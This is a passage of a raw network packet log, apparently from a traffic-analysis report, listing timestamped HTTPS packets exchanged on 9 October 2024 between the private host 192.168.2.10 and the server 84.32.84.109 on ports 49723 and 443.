Oct 9, 2024 16:15:58.489213943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489218950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489243984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489259005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489263058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489283085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489301920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489304066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489314079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489356041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489356041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489430904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489664078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489763975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489783049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489785910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489805937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.489957094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.489999056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.490017891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.490021944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.490044117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.492459059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.546750069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.546777964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.546811104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.546824932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.546863079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.546868086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.546880960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.546890020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.546916962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547007084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547086000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547090054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547137976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547194958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547259092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547394037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547444105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547542095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547729015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547745943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547749043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.547770977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.547802925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548064947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548103094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548106909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548115969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548186064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548428059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548475027 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548479080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548609018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548638105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548666000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548724890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548724890 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548729897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548810959 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.548926115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.548995972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549105883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549135923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549186945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549190044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549300909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549449921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549627066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549628019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549637079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549696922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549787045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549931049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.549953938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.549999952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550142050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550189972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550563097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550596952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550612926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550621986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550643921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550679922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550767899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550860882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550913095 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550939083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550964117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.550967932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.550992012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.551261902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.551306009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.551315069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.551389933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.572787046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.572863102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.572866917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.572880030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.572917938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.572936058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.572941065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.572967052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.573860884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.634846926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.634908915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.634927988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.634932995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.634964943 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635016918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635062933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635086060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635195971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635215044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635217905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635236979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635298014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635335922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635339022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635369062 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635454893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635458946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635862112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635921955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635942936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635946989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.635973930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.635989904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636075020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636091948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636096001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636123896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636487961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636538029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636543036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636579037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636634111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636637926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636641979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636809111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636815071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636897087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636910915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636923075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.636939049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.636975050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637017965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637020111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637028933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637063026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637110949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637170076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637482882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637540102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637593985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637639046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637686014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637732983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637748957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637789965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637840986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637929916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.637934923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.637995958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638010979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638015032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638046026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638325930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638418913 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638422966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638536930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638556004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638560057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638586044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638731956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.638771057 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.638782978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.639184952 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.665776968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.665847063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.665851116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.665900946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.666017056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.666043043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.666060925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.666064978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.666088104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.666145086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724740982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724809885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724834919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724838972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724888086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724888086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724909067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724912882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724926949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724937916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724956036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724971056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.724982023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.724988937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725275993 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725307941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725320101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725322962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725366116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725373030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725382090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725513935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725533009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725538015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725543022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725591898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725591898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725615978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725656986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725661039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725671053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.725864887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.725867987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726207018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726244926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726253033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726257086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726279974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726294041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726310015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726334095 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726337910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726351976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726543903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726579905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726602077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726605892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726618052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726625919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726645947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726650000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726658106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726691008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726711988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726716042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726722956 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726742029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726753950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726771116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726774931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726783037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.726799965 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726834059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726834059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.726838112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.727315903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.727346897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.727366924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.727370024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.727400064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.727520943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.727724075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.727729082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.728240967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.750356913 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750466108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.750471115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750518084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750535011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.750539064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750547886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750572920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.750597000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.750601053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.750647068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.810902119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811060905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.811065912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811116934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.811117887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811131001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811466932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.811506987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811561108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.811564922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811604023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.811608076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.811618090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812486887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812510014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.812514067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812529087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812541962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.812562943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812580109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.812583923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812611103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812627077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.812748909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.812753916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.812791109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.813354969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.813404083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814179897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814332962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814402103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814454079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814456940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814466953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814483881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814501047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814505100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814517975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814543009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814543009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814570904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814614058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814616919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814656973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.814660072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.814775944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.815617085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815666914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815691948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.815696001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815706968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815711021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.815738916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815751076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.815754890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815773964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815789938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.815799952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.815820932 CEST	49723	443	192.168.2.10	84.32.84.109
